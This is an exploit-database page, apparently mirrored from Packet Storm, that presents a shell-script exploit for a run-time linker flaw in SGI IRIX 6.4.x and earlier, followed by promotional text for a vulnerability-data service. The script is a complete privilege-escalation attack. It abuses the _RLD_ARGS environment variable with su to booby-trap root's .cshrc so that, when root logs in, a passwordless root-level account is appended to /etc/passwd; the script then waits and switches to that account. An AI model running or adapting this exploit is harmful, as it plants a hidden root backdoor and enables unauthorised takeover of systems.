Lucene search
K

SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

🗓️ 28 Apr 2019 00:00:00Reported by Hacker FantasticType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 50 Views

SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creatio

Code
`#!/bin/sh   
# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit  
# =======================================================================  
# The IRIX run-time linker on all versions prior to 6.5 does not properly  
# scrub environment variables when executing binaries with privilege or  
# capabilities. A malicious user can leverage this to create files as the  
# "root" user and partially control the contents.   
#  
# -- HackerFantastic (https://hacker.house)  
#  
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/.x.sh  
chmod 755 /tmp/.x.sh  
_RLD_ARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su  
last -3 root  
echo "[ waiting 5mins for root to login..."  
sleep 300  
su - w00t  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation